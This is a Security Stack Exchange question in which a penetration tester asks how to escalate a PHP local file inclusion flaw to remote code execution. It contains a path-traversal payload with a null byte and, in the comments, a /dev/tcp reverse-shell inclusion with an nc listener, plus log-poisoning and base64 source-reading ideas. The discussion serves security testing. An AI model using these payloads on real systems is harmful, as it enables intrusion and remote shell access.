1

During a penetration test, I came across an endpoint which lets me include local files and I can read /etc/passwd. However I don't have permissions to read proc/self/environ and /etc/shadow.

The endpoint looks like:

http://xxxxx/directory/file.php?classes_dir=../../../../var/log/messages%00 (Apache webserver running php on Ubuntu)

The payload above returns the following error message:

Warning: require_once(../../../../var/log/messages) [function.require-once]: failed to open stream: Permission denied in /var/www/classes/file.php on line 4

I can't read log files because I get permission denied message when I try accessing /var/log/messages ,( because of which log poisoning seems unlikely, in this case.)

The answer to this questions suggest looking into ssh logs, which isn't readable either.

Any ideas how this can be leveraged to RCE?

Community
  • 1
ramailo sathi
  • 271
  • 1
  • 4
  • 18
  • Another thing to try is `/dev/tcp/[your IP]/[listening port]`. Also try pulling down other PHP files and look for other vulnerabilities there. – h4ckNinja May 15 '16 at 22:19
  • You mean something like `http://xxxxx/file.php?classes_dir=../../../../dev/tcp/10.x.x.x/9999%00` and listening for reverse shell `nc -nlvp 9999` ? (That didn't help) – ramailo sathi May 15 '16 at 22:34
  • Yes. It doesn't always work. It's just one of the things I try. – h4ckNinja May 15 '16 at 23:53
  • related: [How to hack linux via Local File Inclusion vulnerability?](https://security.stackexchange.com/questions/20004/how-to-hack-linux-via-local-file-inclusion-vulnerability). – tim May 16 '16 at 11:34
  • I have this same problem in a pentest. Running a old Centos 5 (Final) with Apache 2.2.3 and PHP 5.1.6 – Dusty Boshoff Jun 09 '16 at 13:00
  • did you ever try reading the php file themselves using the base64 encode – Adetutu Jun 19 '17 at 19:43

0 Answers0